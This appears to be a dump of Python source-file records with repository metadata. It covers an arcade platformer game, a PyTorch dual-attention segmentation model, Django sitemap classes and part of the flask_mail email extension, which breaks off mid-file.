        enemy.left = SPRITE_SIZE * 2
        # Set enemy initial speed
        enemy.change_x = 2
        self.enemy_list.append(enemy)
        # -- Draw a enemy on the platform
        enemy = arcade.Sprite("C:/Git/Skoli-haust-2020/Forritun/Verkefni með einkunn/Lokaverkefni/images/character_zombie_idle.png", SPRITE_SCALING)
        enemy.bottom = SPRITE_SIZE * 4
        enemy.left = SPRITE_SIZE * 4
        # Set boundaries on the left/right the enemy can't cross
        enemy.boundary_right = SPRITE_SIZE * 8
        enemy.boundary_left = SPRITE_SIZE * 3
        enemy.change_x = 2
        self.enemy_list.append(enemy)
        # -- Set up the player
        self.player_sprite = arcade.Sprite("C:/Git/Skoli-haust-2020/Forritun/Verkefni með einkunn/Lokaverkefni/images/character1.png", SPRITE_SCALING)
        self.player_list.append(self.player_sprite)
        # Starting position of the player
        self.player_sprite.center_x = 64
        self.player_sprite.center_y = 270
        self.physics_engine = arcade.PhysicsEnginePlatformer(self.player_sprite,
                                                             self.wall_list,
                                                             gravity_constant=GRAVITY)
        # Set the background color
        arcade.set_background_color(arcade.color.AMAZON)
    def on_draw(self):
        """Render the start screen, the win screen, or the running game."""
        arcade.start_render()
        if self.flag:
            # Start screen (shown until Q is pressed).
            arcade.set_background_color(arcade.color.BLUE)
            arcade.draw_text("Lárus Ármann Kjartansson\n Náðu fimm peningum til að vinna leikin \n Ýttu á Q til að hefja leik", 10,300, arcade.color.WHITE, 24)
            arcade.draw_text("Lárus Ármann ",self.view_left+10,self.view_bottom+10, arcade.color.CHERRY, 14)
        elif self.score >=5 and self.flag==False:
            # Win screen after collecting five coins.
            arcade.set_background_color(arcade.color.BUBBLES)
            arcade.draw_text("Leik lokið ",self.view_left+200,self.view_bottom+300, arcade.color.CHERRY, 44)
            arcade.draw_text("Lárus Ármann ",self.view_left+10,self.view_bottom+10, arcade.color.CHERRY, 14)
        else:
            # Normal gameplay: world, player, score overlay and coins.
            arcade.set_background_color(arcade.color.AMAZON)
            self.wall_list.draw()
            self.player_list.draw()
            arcade.draw_text(f"stig: {self.score}", self.player_sprite.center_x-15,self.player_sprite.center_y+30, arcade.color.WHITE, 14)
            arcade.draw_text("Lárus Ármann ",self.view_left+10,self.view_bottom+10, arcade.color.CHERRY, 14)
            self.coin_list.draw()
    def draw_game(self):
        """
        Draw all the sprites, along with the score.
        (NOTE(review): appears unused — on_draw() does the rendering.)
        """
        # Draw all the sprites.
        self.player_list.draw()
        self.coin_list.draw()
        # Put the text on the screen.
        output = f"Score: {self.score}"
        arcade.draw_text(output, 10, 20, arcade.color.WHITE, 14)
    def on_key_press(self, key, modifiers):
        """
        Q leaves the start screen; arrow keys move/jump the player.
        """
        if key == arcade.key.Q:
            self.flag=False
        else:
            if key == arcade.key.UP:
                if self.physics_engine.can_jump():
                    self.player_sprite.change_y = JUMP_SPEED
            elif key == arcade.key.LEFT:
                self.player_sprite.change_x = -MOVEMENT_SPEED
            elif key == arcade.key.RIGHT:
                self.player_sprite.change_x = MOVEMENT_SPEED
    def on_key_release(self, key, modifiers):
        """
        Stop horizontal movement when a left/right arrow key is released.
        """
        if key == arcade.key.LEFT or key == arcade.key.RIGHT:
            self.player_sprite.change_x = 0
    def on_update(self, delta_time):
        """Advance physics, collect coins, and scroll the viewport."""
        self.physics_engine.update()
        self.coin_list.update()
        # Coin pickup: remove touched coins and bump the score.
        hit_list = arcade.check_for_collision_with_list(self.player_sprite, self.coin_list)
        if len(hit_list)>0:
            for pening in hit_list:
                pening.remove_from_sprite_lists()
                self.score=self.score+1
        # --- Manage Scrolling ---
        # Keep track of if we changed the boundary. We don't want to call the
        # set_viewport command if we didn't change the view port.
        changed = False
        # Scroll left
        left_boundary = self.view_left + VIEWPORT_MARGIN
        if self.player_sprite.left < left_boundary:
            self.view_left -= left_boundary - self.player_sprite.left
            changed = True
        # Scroll right
        right_boundary = self.view_left + SCREEN_WIDTH - VIEWPORT_MARGIN
        if self.player_sprite.right > right_boundary:
            self.view_left += self.player_sprite.right - right_boundary
            changed = True
        # Scroll up
        top_boundary = self.view_bottom + SCREEN_HEIGHT - VIEWPORT_MARGIN
        if self.player_sprite.top > top_boundary:
            self.view_bottom += self.player_sprite.top - top_boundary
            changed = True
        # Scroll down
        bottom_boundary = self.view_bottom + VIEWPORT_MARGIN
        if self.player_sprite.bottom < bottom_boundary:
            self.view_bottom -= bottom_boundary - self.player_sprite.bottom
            changed = True
        # Make sure our boundaries are integer values. While the view port does
        # support floating point numbers, for this application we want every pixel
        # in the view port to map directly onto a pixel on the screen. We don't want
        # any rounding errors.
        self.view_left = int(self.view_left)
        self.view_bottom = int(self.view_bottom)
        # If we changed the boundary values, update the view port to match
        if changed:
            arcade.set_viewport(self.view_left,
                                SCREEN_WIDTH + self.view_left - 1,
                                self.view_bottom,
                                SCREEN_HEIGHT + self.view_bottom - 1)
def main():
    """Create the game window, build the level, and start the arcade event loop."""
    game = MyGame()
    game.setup()
    arcade.run()
if __name__ == "__main__":
    main()
"larus.armann@gmail.com"
] | larus.armann@gmail.com |
05770b3305811e367771593ca4927690af14e802 | 5f8cfff64811b37ba3cbdee17100c23cc2bb3a53 | /encoding/models/danetPSP_nonsharedbn.py | d4f4f3ddf010412c4fe37988292d118bfc2936cc | [] | no_license | ZhenningZhou/AffKpNet | 656d1f31e66bdb39ddfbca60281b574efc556a99 | 412813d2ca0d8cc2b0b75f78ee957e1b7a919b83 | refs/heads/master | 2023-05-29T08:15:37.097045 | 2021-06-15T04:15:02 | 2021-06-15T04:15:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,607 | py | ###########################################################################
# Created by: CASIA IVA
# Email: jliu@nlpr.ia.ac.cn
# Copyright (c) 2018
###########################################################################
from __future__ import division
import os
import numpy as np
import torch
import torch.nn as nn
from torch.nn.functional import upsample,normalize
from ..nn import PAM_Module
from ..nn import CAM_Module
from ..models import BaseNet
__all__ = ['DANetPSP', 'get_danetpsp']
class DANetPSP(BaseNet):
    r"""Dual Attention Network (position + channel attention) segmentation model.

    Wraps a dilated-backbone :class:`BaseNet` and attaches a :class:`DANetHead`
    on the 2048-channel stage-4 features.

    Parameters
    ----------
    nclass : int
        Number of categories for the training dataset.
    backbone : string
        Pre-trained dilated backbone network type (default:'resnet50'; 'resnet50',
        'resnet101' or 'resnet152').
    norm_layer : object
        Normalization layer used in backbone network (default: :class:`mxnet.gluon.nn.BatchNorm`;

    Reference:
        Fu, Jun, et al. "Dual Attention Network for Scene Segmentation." *CVPR*, 2019
    """
    def __init__(self, nclass, backbone, aux=False, se_loss=False, norm_layer=nn.BatchNorm2d, **kwargs):
        super(DANetPSP, self).__init__(nclass, backbone, aux, se_loss, norm_layer=norm_layer, **kwargs)
        # Attention head over the 2048-channel final backbone stage.
        self.head = DANetHead(2048, nclass, norm_layer)

    def forward(self, x):
        # Spatial size of the input; all outputs are upsampled back to it.
        imsize = x.size()[2:]
        _, _, c3, c4 = self.base_forward(x)
        # Head returns three per-class maps (presumably fused / position /
        # channel branches — confirm against DANetHead.forward).
        x = self.head(c4)
        x = list(x)
        x[0] = upsample(x[0], imsize, **self._up_kwargs)
        x[1] = upsample(x[1], imsize, **self._up_kwargs)
        x[2] = upsample(x[2], imsize, **self._up_kwargs)
        outputs = [x[0]]
        outputs.append(x[1])
        outputs.append(x[2])
        return tuple(outputs)
class DANetHead(nn.Module):
    """Dual-attention head (position + channel attention) augmented with a
    PSP-like pyramid of position-attention branches at multiple pooled
    scales.  Returns three logit maps: fused, position-only, channel-only.
    """
    def __init__(self, in_channels, out_channels, norm_layer):
        super(DANetHead, self).__init__()
        inter_channels = in_channels // 4
        # Two parallel 3x3 reductions: one feeding the position-attention
        # pathway (5a), one the channel-attention pathway (5c).
        self.conv5a = nn.Sequential(nn.Conv2d(in_channels, inter_channels, 3, padding=1, bias=False),
                                    norm_layer(inter_channels),
                                    nn.ReLU())
        self.conv5c = nn.Sequential(nn.Conv2d(in_channels, inter_channels, 3, padding=1, bias=False),
                                    norm_layer(inter_channels),
                                    nn.ReLU())
        # One position-attention module per pyramid scale, plus one at the
        # native resolution.  (Names like "1x1" refer to the pyramid level,
        # not the kernel size.)
        self.sa1x1 = PAM_Module(inter_channels)
        self.sa2x2 = PAM_Module(inter_channels)
        self.sa3x3 = PAM_Module(inter_channels)
        self.sa6x6 = PAM_Module(inter_channels)
        self.sa = PAM_Module(inter_channels)
        self.sc = CAM_Module(inter_channels)
        self.conv51 = nn.Sequential(nn.Conv2d(inter_channels, inter_channels, 3, padding=1, bias=False),
                                    norm_layer(inter_channels),
                                    nn.ReLU())
        self.conv52 = nn.Sequential(nn.Conv2d(inter_channels, inter_channels, 3, padding=1, bias=False),
                                    norm_layer(inter_channels),
                                    nn.ReLU())
        # Classifier heads: fused (conv8), position (conv6), channel (conv7).
        self.conv6 = nn.Sequential(nn.Dropout2d(0.1, False), nn.Conv2d(512, out_channels, 1))
        self.conv7 = nn.Sequential(nn.Dropout2d(0.1, False), nn.Conv2d(512, out_channels, 1))
        self.conv8 = nn.Sequential(nn.Dropout2d(0.1, False), nn.Conv2d(512, out_channels, 1))
        # Pyramid pooling at four window sizes; each branch is projected
        # down to 128 channels so the 5-way concat totals 512.
        self.avepool1x1 = nn.AvgPool2d(9, 9)
        self.conv1x1 = nn.Sequential(nn.Conv2d(512, 128, 1), norm_layer(inter_channels//4),nn.Dropout2d(0.1, False), )
        self.avepool2x2 = nn.AvgPool2d(5, 5)
        self.conv2x2 = nn.Sequential(nn.Conv2d(512, 128, 1), norm_layer(inter_channels//4),nn.Dropout2d(0.1, False), )
        self.avepool3x3 = nn.AvgPool2d(3, 3)
        self.conv3x3 = nn.Sequential(nn.Conv2d(512, 128, 1), norm_layer(inter_channels//4),nn.Dropout2d(0.1, False), )
        self.avepool6x6 = nn.AvgPool2d(2, 2)
        self.conv6x6 = nn.Sequential(nn.Conv2d(512, 128, 1), norm_layer(inter_channels//4),nn.Dropout2d(0.1, False), )
        # NOTE(review): the upsample target is hard-coded, so this head
        # assumes a 60x60 C4 feature map (i.e. a fixed input crop size) --
        # TODO confirm against the training configuration.
        self.interp = nn.Upsample(size=(60, 60), mode='bilinear')
        self.conv512 = nn.Sequential(nn.Conv2d(1024, 512, 1), norm_layer(inter_channels),nn.Dropout2d(0.1, False), )

    def forward(self, x):
        feat1 = self.conv5a(x)
        # PSP below: pool -> position attention -> upsample -> 128-ch proj,
        # repeated for each pyramid scale.
        featpsp1x1 = self.avepool1x1(feat1)
        featpsp1x1 = self.sa1x1(featpsp1x1)
        featpsp1x1 = self.interp(featpsp1x1)
        sa_feat1x1 = self.conv1x1(featpsp1x1)
        featpsp2x2 = self.avepool2x2(feat1)
        featpsp2x2 = self.sa2x2(featpsp2x2)
        featpsp2x2 = self.interp(featpsp2x2)
        sa_feat2x2 = self.conv2x2(featpsp2x2)
        featpsp3x3 = self.avepool3x3(feat1)
        featpsp3x3 = self.sa3x3(featpsp3x3)
        featpsp3x3 = self.interp(featpsp3x3)
        sa_feat3x3 = self.conv3x3(featpsp3x3)
        featpsp6x6 = self.avepool6x6(feat1)
        featpsp6x6 = self.sa6x6(featpsp6x6)
        featpsp6x6 = self.interp(featpsp6x6)
        sa_feat6x6 = self.conv6x6(featpsp6x6)
        # Native-resolution position attention.
        sa_feat = self.sa(feat1)
        # concatenate all 4 channels (plus the native branch): 512+4*128=1024,
        # then reduce back to 512.
        sa_feat = torch.cat((sa_feat,sa_feat1x1,sa_feat2x2,sa_feat3x3,sa_feat6x6), 1)
        sa_feat = self.conv512(sa_feat)
        sa_conv = self.conv51(sa_feat)
        sa_output = self.conv6(sa_conv)
        # Channel-attention pathway.
        feat2 = self.conv5c(x)
        sc_feat = self.sc(feat2)
        sc_conv = self.conv52(sc_feat)
        sc_output = self.conv7(sc_conv)
        # Element-wise fusion of both pathways feeds the main classifier.
        feat_sum = sa_conv+sc_conv
        sasc_output = self.conv8(feat_sum)
        output = [sasc_output]
        output.append(sa_output)
        output.append(sc_output)
        return tuple(output)
def get_danetpsp(dataset='pascal_voc', backbone='resnet50', pretrained=False,
                 root='./pretrain_models', **kwargs):
    r"""Build a :class:`DANetPSP` for *dataset*, optionally loading weights.

    DANet model from the paper `"Dual Attention Network for Scene
    Segmentation" <https://arxiv.org/abs/1809.02983.pdf>`
    """
    # Short dataset codes used in pretrained checkpoint file names.
    acronyms = {
        'pascal_voc': 'voc',
        'pascal_aug': 'voc',
        'pcontext': 'pcontext',
        'ade20k': 'ade',
        'cityscapes': 'cityscapes',
    }
    # infer number of classes
    from ..datasets import datasets, VOCSegmentation, VOCAugSegmentation, ADE20KSegmentation
    num_classes = datasets[dataset.lower()].NUM_CLASS
    model = DANetPSP(num_classes, backbone=backbone, root=root, **kwargs)
    if pretrained:
        from .model_store import get_model_file
        checkpoint_path = get_model_file(
            'fcn_%s_%s' % (backbone, acronyms[dataset]), root=root)
        model.load_state_dict(torch.load(checkpoint_path), strict=False)
    return model
| [
"fujenchu@gatech.edu"
] | fujenchu@gatech.edu |
343be7b674ad7ed5232dd69911abf6fbc5fe98a4 | 78ddf555db358f9683db00bf49b3d1a45cd998a9 | /forum/sitemaps.py | a4b63e0a11b35c9a8578c0a28eaf27bfbf104a43 | [] | no_license | azeez010/AfriconnForum | 9e0aa7a6abb40f20ac0739b9cadc75da89e91110 | 1b597850208c3caef474b9412bdf02dfefd1a30b | refs/heads/master | 2022-12-19T12:49:09.389062 | 2020-09-19T14:40:48 | 2020-09-19T14:40:48 | 298,311,404 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,269 | py | from django.contrib.sitemaps import Sitemap
from root.models import Profile
from polls.models import Poll
from job.models import Job
from blog.models import Blog
from .models import Thread, Category
from django.shortcuts import reverse
class StaticViewSiteMap(Sitemap):
    """Sitemap for the site's static, named URL patterns."""

    # Django's sitemap framework reads the lowercase ``changefreq``
    # attribute; the original camel-cased ``changeFreq`` was silently
    # ignored, so no <changefreq> element was emitted.
    changefreq = 'always'

    def items(self):
        # Named URL patterns to expose in the sitemap.
        return ['search-blog', 'forum-home', 'blog-home', 'all-category', 'search-forum', 'register', 'login', 'home', 'countrystats', 'info', 'new', 'search', 'results', "job-home", 'search-job', 'joblist']

    def location(self, item):
        # Resolve each URL name to its absolute path.
        return reverse(item)
class ProfileSiteMap(Sitemap):
    """Sitemap over all user profiles (uses each Profile's get_absolute_url)."""

    # Lowercase ``changefreq`` is the attribute Django actually reads;
    # the camel-cased ``changeFreq`` was silently ignored.
    changefreq = 'always'

    def items(self):
        return Profile.objects.all()
class PollSiteMap(Sitemap):
    """Sitemap over all polls."""

    # Lowercase ``changefreq`` is the attribute Django actually reads.
    changefreq = 'always'

    def items(self):
        return Poll.objects.all()
class CategorySiteMap(Sitemap):
    """Sitemap over all forum categories."""

    # Lowercase ``changefreq`` is the attribute Django actually reads.
    changefreq = 'always'

    def items(self):
        return Category.objects.all()
class ThreadSiteMap(Sitemap):
    """Sitemap over all forum threads."""

    # Lowercase ``changefreq`` is the attribute Django actually reads.
    changefreq = 'always'

    def items(self):
        return Thread.objects.all()
class JobSiteMap(Sitemap):
    """Sitemap over all job postings."""

    # Lowercase ``changefreq`` is the attribute Django actually reads.
    changefreq = 'always'

    def items(self):
        return Job.objects.all()
class BlogSiteMap(Sitemap):
    """Sitemap over all blog posts."""

    # Lowercase ``changefreq`` is the attribute Django actually reads.
    changefreq = 'always'

    def items(self):
        return Blog.objects.all()
| [
"dataslid@gmail.com"
] | dataslid@gmail.com |
4e05342bbe67e0b1ef38fe46f34073cc3d59822c | 0567b686db4d05b44a70fdfd7a61ed07f3be1fb4 | /flask_mail.py | 50630a3d0f3206394769458abef4da70620487e8 | [
"MIT"
] | permissive | achiang/flask-unchained | 624271d903a8d2af2c15d83c79571e8b5f91a56e | 12788a6e618904a25ff2b571eb05ff1dc8f1840f | refs/heads/master | 2020-04-19T20:21:10.731764 | 2018-12-29T07:06:14 | 2018-12-29T07:06:14 | 168,411,738 | 0 | 0 | MIT | 2019-01-30T20:39:42 | 2019-01-30T20:39:41 | null | UTF-8 | Python | false | false | 22,070 | py | # -*- coding: utf-8 -*-
"""
flaskext.mail
~~~~~~~~~~~~~
Flask extension for sending email.
Copyright (c) 2010 by danjac.
Some rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following
disclaimer in the documentation and/or other materials provided
with the distribution.
* The names of the contributors may not be used to endorse or
promote products derived from this software without specific
prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
from __future__ import with_statement
import re
import smtplib
import sys
import time
import unicodedata
from contextlib import contextmanager
from email import charset
from email.encoders import encode_base64
from email.header import Header
from email.mime.base import MIMEBase
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.utils import formataddr, formatdate, make_msgid, parseaddr
import blinker
from flask import current_app
# ``email.policy`` exists only on Python 3.3+; fall back to the default
# (compat32) policy when unavailable.
try:
    from email import policy
    message_policy = policy.SMTP
except ImportError:
    message_policy = None

__version__ = '0.9.3'

# Python 2/3 compatibility shims.
PY3 = sys.version_info[0] == 3
PY34 = PY3 and sys.version_info[1] >= 4

if PY3:
    string_types = str,
    text_type = str
else:
    string_types = basestring, # noqa: F821
    text_type = unicode # noqa: F821

# Prefer quoted-printable/base64 (whichever is shortest) over the default
# base64-everything behavior for UTF-8 bodies.
charset.add_charset('utf-8', charset.SHORTEST, None, 'utf-8')
class FlaskMailUnicodeDecodeError(UnicodeDecodeError):
    """A UnicodeDecodeError that also records the offending object.

    Makes debugging easier by showing *what* failed to decode, not only
    where, in the exception message.
    """

    def __init__(self, obj, *args):
        self.obj = obj
        super(FlaskMailUnicodeDecodeError, self).__init__(*args)

    def __str__(self):
        base_message = UnicodeDecodeError.__str__(self)
        return '%s. You passed in %r (%s)' % (
            base_message, self.obj, type(self.obj)
        )
def force_text(s, encoding='utf-8', errors='strict'):
    """
    Coerce *s* to a unicode string, decoding bytes with *encoding*.

    Similar to smart_text, except that lazy instances are resolved to
    strings, rather than kept as lazy objects.
    """
    if isinstance(s, text_type):
        return s
    try:
        if isinstance(s, string_types):
            # Python 2 byte string: decode it directly.
            s = s.decode(encoding, errors)
        elif PY3:
            if isinstance(s, bytes):
                s = text_type(s, encoding, errors)
            else:
                s = text_type(s)
        elif hasattr(s, '__unicode__'):
            s = s.__unicode__()
        else:
            s = text_type(bytes(s), encoding, errors)
    except UnicodeDecodeError as e:
        if not isinstance(s, Exception):
            raise FlaskMailUnicodeDecodeError(s, *e.args)
        # An exception whose repr failed to decode: coerce each of its
        # args individually and join them.
        s = ' '.join(force_text(arg, encoding, errors) for arg in s)
    return s
def sanitize_subject(subject, encoding='utf-8'):
    """Return *subject* unchanged when it is pure ASCII, otherwise RFC 2047
    encode it (preferring *encoding*, falling back to UTF-8)."""
    try:
        subject.encode('ascii')
        return subject
    except UnicodeEncodeError:
        try:
            return Header(subject, encoding).encode()
        except UnicodeEncodeError:
            return Header(subject, 'utf-8').encode()
def sanitize_address(addr, encoding='utf-8'):
    """Return a header-safe ``Name <addr>`` string for *addr*.

    *addr* may be a raw address string or a ``(name, email)`` pair.  The
    display name is RFC 2047 encoded when non-ASCII, and non-ASCII domains
    are IDNA-encoded.
    """
    if isinstance(addr, string_types):
        addr = parseaddr(force_text(addr))
    nm, addr = addr
    try:
        nm = Header(nm, encoding).encode()
    except UnicodeEncodeError:
        # Fall back to UTF-8 if the requested charset cannot represent it.
        nm = Header(nm, 'utf-8').encode()
    try:
        addr.encode('ascii')
    except UnicodeEncodeError:  # IDN
        if '@' in addr:
            localpart, domain = addr.split('@', 1)
            try:
                localpart = Header(localpart, encoding).encode()
            except UnicodeEncodeError:
                localpart = Header(localpart, 'utf-8').encode()
            # Internationalized domain names are punycode-encoded.
            domain = domain.encode('idna').decode('ascii')
            addr = '@'.join([localpart, domain])
        else:
            addr = Header(addr, encoding).encode()
    return formataddr((nm, addr))
def sanitize_addresses(addresses, encoding='utf-8'):
    """Lazily sanitize every address in *addresses*."""
    return (sanitize_address(address, encoding) for address in addresses)
def fix_recipients_list(recipients):
    """Normalize recipient entries: ``[name, email]`` lists become tuples
    (so they are hashable for ``set()``); plain strings pass through."""
    return [recipient if isinstance(recipient, string_types)
            else tuple(recipient)
            for recipient in recipients]
def _has_newline(line):
"""Used by has_bad_header to check for \\r or \\n"""
if line and ('\r' in line or '\n' in line):
return True
return False
class Connection(object):
    """Handles connection to host.

    Context manager owning one SMTP session: entering opens (and secures)
    the connection unless sending is suppressed; exiting closes it.
    """

    def __init__(self, mail):
        # The _Mail configuration object this connection was created from.
        self.mail = mail

    def __enter__(self):
        # With MAIL_SUPPRESS_SEND no connection is opened; send() then only
        # fires the email_dispatched signal (useful in tests).
        if self.mail.suppress:
            self.host = None
        else:
            self.host = self.configure_host()

        self.num_emails = 0

        return self

    def __exit__(self, exc_type, exc_value, tb):
        if self.host and getattr(self.host, 'sock', None):
            try:
                self.host.quit()
            except smtplib.SMTPServerDisconnected:
                # The server already hung up; nothing left to close.
                pass

    def configure_host(self):
        """Open, optionally secure, and authenticate the SMTP session."""
        if self.mail.use_ssl:
            host = smtplib.SMTP_SSL(self.mail.server, self.mail.port)
        else:
            host = smtplib.SMTP(self.mail.server, self.mail.port)

        host.set_debuglevel(int(self.mail.debug))

        if self.mail.use_tls:
            (resp, reply) = host.starttls()
            # Fix CVE-2016-0772 on old Python installations whose smtplib
            # did not validate the STARTTLS reply.  Per RFC 3207 the
            # success code is 220; the previous comparison against 200
            # raised on every *successful* handshake.
            if resp != 220:
                raise smtplib.SMTPResponseException(resp, reply)

        if self.mail.username and self.mail.password:
            host.login(self.mail.username, self.mail.password)

        return host

    def send(self, message, envelope_from=None):
        """Verifies and sends message.

        :param message: Message instance.
        :param envelope_from: Email address to be used in MAIL FROM command.
        :raises BadHeaderError: if any header contains a newline.
        """
        assert message.send_to, "No recipients have been added"

        assert message.sender, (
            "The message does not specify a sender and a default sender "
            "has not been configured")

        if message.has_bad_headers():
            raise BadHeaderError

        if message.date is None:
            message.date = time.time()

        ret = None
        if self.host:
            ret = self.host.sendmail(
                sanitize_address(envelope_from or message.sender),
                list(sanitize_addresses(message.send_to)),
                message.as_bytes() if PY3 else message.as_string(),
                message.mail_options,
                message.rcpt_options
            )

        # Fired even in suppressed/testing mode so record_messages() works.
        email_dispatched.send(message, app=current_app._get_current_object())

        self.num_emails += 1
        if self.num_emails == self.mail.max_emails:
            # Recycle the connection after MAIL_MAX_EMAILS messages.
            self.num_emails = 0
            if self.host:
                self.host.quit()
                self.host = self.configure_host()

        return ret

    def send_message(self, *args, **kwargs):
        """Shortcut for send(msg).

        Takes same arguments as Message constructor.

        :versionadded: 0.3.5
        """
        return self.send(Message(*args, **kwargs))
class BadHeaderError(Exception):
    """Raised when a message header contains a newline (header injection)."""
    pass
class Attachment(object):
    """Encapsulates file attachment information.

    :versionadded: 0.3.5

    :param filename: filename of attachment
    :param content_type: file mimetype
    :param data: the raw file data
    :param disposition: content-disposition (if any); defaults to
        ``'attachment'``
    :param headers: extra MIME headers for the attachment part
    :param content_id: content-id for inline reference
    """

    def __init__(self, filename=None, content_type=None, data=None,
                 disposition=None, headers=None, content_id=None):
        self.filename = filename
        self.content_type = content_type
        self.data = data
        self.content_id = content_id
        # Fall back to the standard disposition / an empty header dict.
        self.disposition = disposition or 'attachment'
        self.headers = headers or {}
class Message(object):
    """Encapsulates an email message.

    :param subject: email subject header
    :param recipients: list of email addresses
    :param body: plain text message
    :param html: HTML message
    :param alts: A dict or an iterable to go through dict() that contains
        multipart alternatives
    :param sender: email sender address, or **MAIL_DEFAULT_SENDER** by default
    :param cc: CC list
    :param bcc: BCC list
    :param attachments: list of Attachment instances
    :param reply_to: reply-to address
    :param date: send date
    :param charset: message character set
    :param extra_headers: A dictionary of additional headers for the message
    :param mail_options: A list of ESMTP options to be used in MAIL FROM
    :param rcpt_options: A list of ESMTP options to be used in RCPT commands
    :param subtype: Media subtype name for a message
    """

    def __init__(self, subject='',
                 recipients=None,
                 body=None,
                 html=None,
                 alts=None,
                 sender=None,
                 cc=None,
                 bcc=None,
                 attachments=None,
                 reply_to=None,
                 date=None,
                 charset=None,
                 extra_headers=None,
                 mail_options=None,
                 rcpt_options=None,
                 subtype=None):
        # Requires an application context when no explicit sender is given.
        sender = sender or current_app.extensions['mail'].default_sender

        if isinstance(sender, tuple):
            sender = "%s <%s>" % sender

        self.recipients = recipients or []
        self.subject = subject
        self.sender = sender
        self.reply_to = reply_to
        self.cc = cc or []
        self.bcc = bcc or []
        self.body = body
        # ``alts`` maps MIME subtype -> content; ``html`` is a shortcut for
        # the 'html' entry (see the property below).
        self.alts = dict(alts or {})
        self.html = html
        self.date = date
        self.msgId = make_msgid()
        self.charset = charset
        self.extra_headers = extra_headers
        self.subtype = subtype
        self.mail_options = mail_options or []
        self.rcpt_options = rcpt_options or []
        self.attachments = attachments or []

    # recipients/cc/bcc setters normalize [name, email] pairs to tuples so
    # that ``send_to`` can build a set out of them.
    @property
    def recipients(self):
        return self._recipients

    @recipients.setter
    def recipients(self, recipients):
        self._recipients = fix_recipients_list(recipients)

    @property
    def cc(self):
        return self._cc

    @cc.setter
    def cc(self, recipients):
        self._cc = fix_recipients_list(recipients)

    @property
    def bcc(self):
        return self._bcc

    @bcc.setter
    def bcc(self, recipients):
        self._bcc = fix_recipients_list(recipients)

    @property
    def send_to(self):
        # De-duplicated union of all recipient lists (To + Bcc + Cc).
        return set(self.recipients) | set(self.bcc or ()) | set(self.cc or ())

    @property
    def html(self):
        return self.alts.get('html')

    @html.setter
    def html(self, value):
        if value is None:
            self.alts.pop('html', None)
        else:
            self.alts['html'] = value

    def _mimetext(self, text, subtype=None):
        """Creates a MIMEText object with the given subtype (default: 'plain')
        If the text is unicode, the utf-8 charset is used.
        """
        subtype = subtype or 'plain'
        charset = self.charset or 'utf-8'
        return MIMEText(text, _subtype=subtype, _charset=charset)

    def _message(self):
        """Creates the email (a MIMEText or MIMEMultipart tree)."""
        ascii_attachments = current_app.extensions['mail'].ascii_attachments
        encoding = self.charset or 'utf-8'

        attachments = self.attachments or []

        # Choose the simplest structure that fits the content.
        if len(attachments) == 0 and not self.alts:
            # No html content and zero attachments means plain text
            msg = self._mimetext(self.body, self.subtype)
        elif len(attachments) > 0 and not self.alts:
            # No html and at least one attachment means multipart
            subtype = self.subtype or 'mixed'
            msg = MIMEMultipart(_subtype=subtype)
            msg.attach(self._mimetext(self.body))
        else:
            # Anything else
            subtype = self.subtype or 'mixed'
            msg = MIMEMultipart(_subtype=subtype)
            alternative = MIMEMultipart(_subtype='alternative')
            alternative.attach(self._mimetext(self.body))
            for mimetype, content in self.alts.items():
                alternative.attach(self._mimetext(content, mimetype))
            msg.attach(alternative)

        if self.subject:
            msg['Subject'] = sanitize_subject(force_text(self.subject),
                                              encoding)

        msg['From'] = sanitize_address(self.sender, encoding)
        msg['To'] = ', '.join(
            list(set(sanitize_addresses(self.recipients, encoding)))
        )

        msg['Date'] = formatdate(self.date, localtime=True)
        # see RFC 5322 section 3.6.4.
        msg['Message-ID'] = self.msgId

        if self.cc:
            msg['Cc'] = ', '.join(
                list(set(sanitize_addresses(self.cc, encoding)))
            )

        if self.reply_to:
            msg['Reply-To'] = sanitize_address(self.reply_to, encoding)

        if self.extra_headers:
            for k, v in self.extra_headers.items():
                msg[k] = v

        SPACES = re.compile(r'[\s]+', re.UNICODE)
        for attachment in attachments:
            f = MIMEBase(*attachment.content_type.split('/'))
            f.set_payload(attachment.data)
            encode_base64(f)

            filename = attachment.filename
            if filename and ascii_attachments:
                # force filename to ascii
                filename = unicodedata.normalize('NFKD', filename)
                filename = filename.encode('ascii', 'ignore').decode('ascii')
                filename = SPACES.sub(u' ', filename).strip()

            try:
                filename and filename.encode('ascii')
            except UnicodeEncodeError:
                # RFC 2231 encoding for non-ASCII filenames.
                if not PY3:
                    filename = filename.encode('utf8')
                filename = ('UTF8', '', filename)

            f.add_header('Content-Disposition',
                         attachment.disposition,
                         filename=filename)

            for key, value in attachment.headers.items():
                f.add_header(key, value)

            if attachment.content_id:
                try:
                    f.replace_header('Content-ID', attachment.content_id)
                except KeyError:
                    f.add_header('Content-ID', attachment.content_id)

            msg.attach(f)

        if message_policy:
            msg.policy = message_policy

        return msg

    def as_string(self):
        """Return the full RFC 5322 serialization of the message."""
        return self._message().as_string()

    def as_bytes(self):
        return self._message().as_string().encode(self.charset or 'utf-8')

    def __str__(self):
        return self.as_string()

    def __bytes__(self):
        return self.as_bytes()

    def has_bad_headers(self):
        """
